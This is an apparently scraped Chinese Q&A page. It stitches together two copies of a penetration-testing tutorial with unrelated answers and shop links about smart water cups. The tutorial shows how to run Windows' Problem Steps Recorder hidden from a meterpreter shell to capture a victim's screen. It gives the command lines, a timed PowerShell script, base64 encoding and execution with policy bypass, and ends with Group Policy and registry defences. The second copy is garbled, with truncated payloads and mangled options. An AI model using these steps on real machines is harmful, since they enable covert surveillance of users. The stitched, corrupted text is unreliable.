⑴ 如何巧妙利用PSR监控Windows桌面
0x00 前言
在渗透测试的过程中,如果需要获取主机的更多信息,相比于键盘记录,记录系统屏幕的操作往往更加直接有效。
也许每个人都有自己独特的实现方式,但是如果能够利用Windows系统自带的程序实现,个人认为绝对是最优先考虑的方案。
下面就介绍一下如何利用Windows系统自带的功能实现监控屏幕操作。
0x01 简介
PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用 WER (Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。
为此,微软从Windows 7系统开始,增加了PSR来解决这个问题,PSR能够记录用户在遇到崩溃时执行的所有操作,以便测试人员和开发人员能够重现环境对其分析和调试。
当PSR运行时,将会自动记录屏幕的操作,每次操作都会自动保存成一张图片,最终生成一份zip格式的报告。
注:
网络对psr的名称描述有误,准确的应为Problem Steps Recorder(该问题已提交)
如图
链接为:
http://ke..com/link?url=BCQtF6gpxNGulRPj-vACw_NGwZvHPcrfvn4vmx6u_JFI_OcuPJIFzY3GYE-mu91DZcB-RLiQ6pGXTki1Fc0Y6K
0x02 使用方法
1、启动psr.exe,点击开始录制
可使用快捷键win+R直接输入psr来启动下图为psr的操作面板,点击开始记录即可记录当前的屏幕操作
点击后会提示权限的问题,如果需要记录管理员权限的程序,那么需要以管理员权限来运行psr,如图
2、进行任意操作
当运行psr开始录制后,鼠标点击时会增加特效
如图
3、停止记录,保存报告
如图
4、查看报告
报告会对每次操作截图,并记录鼠标的操作
比如鼠标的单击操作,从截图注释可以看到当前的鼠标做了哪些操作
而且,在报告后半部分会详细记录相关细节,里面的内容也很是有趣:
0x03 进阶方法
psr在记录屏幕的操作中会启动UI界面,并且对鼠标点击操作增加特效,这显然无法满足渗透测试的要求。
但好在psr提供了命令行参数用作后台记录
命令行参数如下:
#!bash
psr.exe [/start |/stop][/output <fullfilepath>] [/sc (0|1)] [/maxsc <value>]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]
/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size (in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.
结合实际,可使用以下命令:
psr.exe /start /gui 0 /output C:\test\capture.zip
后台启动psr并开始录制,文件保存为C:\test\capture.zip
psr.exe /stop
结束录制并退出psr,自动保存报告文件
0x04 实际测试
测试环境:
Server:
OS:Kali linux
IP:192.168.174.133
Client:
OS:Win7 x86
IP:192.168.174.128
Kali已获得meterpreter权限
如图
测试功能:
自动启动录制
录制指定时间后自动退出
自动保存报告文件
可使用Powershell对上述功能做简单实现:
1、启动自动录制,设置为无界面模式,并指定输出路径:
#!bash
psr.exe /start /gui 0 /output C:\test\capture.zip;
2、等待10s,即录制时间为10s:
#!bash
Start-Sleep -s 10;
3、结束录制,自动退出:
#!bash
psr.exe /stop;
可将以上代码保存为 C:\test\1.txt ,然后对其作base64加密
在Powershell环境下执行如下代码来对功能代码进行base64加密:
#!powershell
$string=Get-Content "C:\test\1.txt"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($string)
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
如图,从输出得到加密的Powershell命令为:
#!bash
BzAHQAbwBwADsA
然后就可以在meterpreter的shell下直接执行Powershell命令:
#!bash
powershell -ep bypass -enc BzAHQAbwBwADsA
代码执行后,等待10s产成报告文件capture.zip,测试成功
0x05 防御
可采用以下两种方法关闭psr:
1、使用组策略
中文系统:
gpedit.msc-管理模板-Windows组件-应用程序兼容性
启用关闭问题步骤记录器
如图
英文系统:
gpedit.msc-Computer Configuration-Administrative Templates-Windows Components-Application Compatibility
启用Turn off Problem Steps Recorder
如图
2、修改注册表
#!bash
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]
新建 "DisableUAR"=dword:00000001
如图
注:
dword=1对应组策略中的已启用
dword=0对应组策略中的已禁用
删除"DisableUAR"对应组策略中的未配置
0x06 小结
利用PSR监控Windows桌面,不仅仅能够捕获用户桌面的操作,而且在报告中会包含更多有用的细节信息,相信你在渗透测试的过程中,一定会用上它。
⑵ 智能水杯哪个牌子好,有什么好的推荐
感觉智能水杯品牌还是满多的,比如麦开,桔子,ocup,lehoo智能水杯等等。lehoo偏实用,整体不错。
⑶ 如何巧妙利用PSR监控Windows桌面
0x00前言在渗透测试的过程中,如果需要获取主机的信息,相比于键盘记录,记录系统屏幕的操作往往更加直接有效。也许每个人都有自己独特的实现方式,但是如果能够利用Windows系统自带的程序实现,个人认为绝对是最优先考虑的方案。下面就介绍一下如何利用Windows系统自带的功能实现监控屏幕操作。0x01简介PSR(ProblemStepsRecorder),直译为问题步骤记录器,在Windows早期的系统中,采用WER(WindowsErrorReporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。为此,微软从Windows7系统开始,增加了PSR来解决这个问题,PSR能够记录用户在遇到崩溃时执行的所有操作,以便测试人员和开发人员能够重现环境对其分析和调试。当PSR运行时,将会自动记录屏幕的操作,每次操作都会自动保存成一张图片,最终生成一份zip格式的报告。注:网络对psr的名称描述有误,准确的应为ProblemStepsRecorder(该问题已提交)如图链接为:http://ke..com/link?url=BCQtF6gpxNGulRPj-vACw_NGwZvHPcrfvn4vmx6u_JFI_OcuPJIFzY3GYE-mu91DZcB-RLiQ6pGXTki1Fc0Y6K0x02使用方法1、启动psr.exe,点击开始录制可使用快捷键win+R直接输入psr来启动下图为psr的操作面板,点击开始记录即可记录当前的屏幕操作点击后会提示权限的问题,如果需要记录管理员权限的程序,那么需要以管理员权限来运行psr,如图2、进行任意操作当运行psr开始录制后,鼠标点击时会增加特效如图3、停止记录,保存报告如图4、查看报告报告会对每次操作截图,并记录鼠标的操作比如鼠标的单击操作,从截图注释可以看到当前的鼠标做了哪些操作而且,在报告后半部分会详细记录相关细节,里面的内容也很是有趣:0x03进阶方法psr在记录屏幕的操作中会启动UI界面,并且对鼠标点击操作增加特效,这显然无法满足渗透测试的要求。但好在psr提供了命令行参数用作后台记录命令行参数如下:#!bashpsr.exe[/start|/stop][/output][/sc(0|1)][/maxsc][/sketch(0|1)][/slides(0|1)][/gui(0|1)][/arcetl(0|1)][/arcxml(0|1)][/arcmht(0|1)][/stopevent][/maxlogsize][/recordpid]/startStartRecording.()/stopStopRecording./././maxlogsizeMaximumlogfilesize(inMB)beforewrappingoccurs./guiDisplaycontrolGUI./././././././.结合实际,可使用以下命令:psr.exe/start/gui0/outputC:\test\capture.zip后台启动psr并开始录制,文件保存为C:\test\capture.zippsr.exe/stop结束录制并退出psr,自动保存报告文件0x04实际测试测试环境:Server:OS:KalilinuxIP:192.168.174.133Client:OS:Win7x86IP:192.168.174.128Kali已获得meterpreter权限如图测试功能:自动启动录制录制指定时间后自动退出自动保存报告文件可使用Powershell对上述功能做简单实现:1、启动自动录制,设置为无界面模式,并指定输出路径:#!bashpsr.exe/start/gui0/outputC:\test\capture.zip;2、等待10s,即录制时间为10s:#!bashStart-Sleep-s10;3、结束录制,自动退出:#!bashpsr.exe/stop;可将以上代码保存为C:\test\1.txt,然后对其作base64加密在Powershell环境下执行如下代码来对功能代码进行base64加密:#!powershell$string=Get-Content"C:\test\1.txt"$bytes=[System.Text.Encoding]::Unicode.GetBytes($string)$encoded=[System.Convert]::ToBase64String($bytes)$encoded如图,从输出得到加密的Powershell命令为:#!AALwBzAHQAbwBwADsA然后就可以在meterpreter的shell下直接执行Powershell命令:#!bashpowershell-epbypass-ALwBzAHQAbwBwADsA代码执行后,等待10s产成报告文件capture.zip,测试成功0x05防御可采用以下两种方法关闭psr:1、使用组策略中文系统:gpedit.msc-管理模板-Windows组件-应用程序兼容性启用关闭问题步骤记录器如图英文系统:gpedit.msc-ComputerConfiguration-AdministrativeTemplates-WindowsComponents-ApplicationCompatibility启用TurnoffProblemStepsRecorder如图2、修改注册表#!bash[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]新建"DisableUAR"=dword:00000001如图注:dword=1对应组策略中的已启用dword=0对应组策略中的已禁用删除"DisableUAR"对应组策略中的未配置0x06小结利用PSR监控Windows桌面,不仅仅能够捕获用户桌面的操作,而且在报告中会包含有用的细节信息,相信你在渗透测试的过程中,一定会用上它。
⑷ ocup智能水杯灯怎么不亮
你好,这个你可以去他们官网看看,一般都有说明的,还有智能水杯我推荐桔子智能水杯不错,你哪个不好用,希望能够帮到你。
⑸ ocup水杯的茶颜功能是什么意思,怎么用
tastea---称之为“茶颜”,是都市茶文化的延续。每一种茶都是独一无二,茶的味道跟四个要素相关:水温、水量、时间、茶量,当这四个要素都能被准确测量,“茶颜”由此诞生。得益于智能和便捷的ocup水杯,您只需在往ocup杯子中放入一包teao茶包,便可以在ocup APP上看到teao茶包的茶味、茶效、产地和茶龄等信息,ocup杯子不仅能对水温、水量进行精准测量,还可以计算出最佳泡茶时间,只需放入teao茶包并倒入适量热水盖好杯盖,ocup自动为您泡好最佳口感、清香四溢的好茶并及时提醒您享用。
目前网络未来商店ocup智能水杯限时优惠,欢迎来选购
购买链接: http://store..com/proct/view/3155.html?ch=a&zch=lab#3155004
⑹ 智能水杯哪个牌子好
在国内智能水杯行业里,我只知道有两个牌子公司比较出名的,一个是麦开,一个是lehoo(乐喝喝),麦开的智能水杯价格偏贵,使用APP链接,有关人士表示现在什么都用手机APP,造成了托累的情况。而lehoo偏向是实用性,买回来并不须要怎样的操作,装上电就可以用,比较大众化。看你怎么选择了~~
⑺ ocup智能水杯怎么显示我喝了多少水啊
ocup智能水杯配合APP使用,在说明书或者在各大应用商店搜索ocup应用,下载安装即可。在APP首页下方菜单的“数据”,可以直观的查看到当前饮水量与目标饮水量。
目前网络未来商店ocup智能水杯限时优惠,欢迎来选购
购买链接: http://store..com/proct/view/3155.html?ch=a&zch=lab#3155004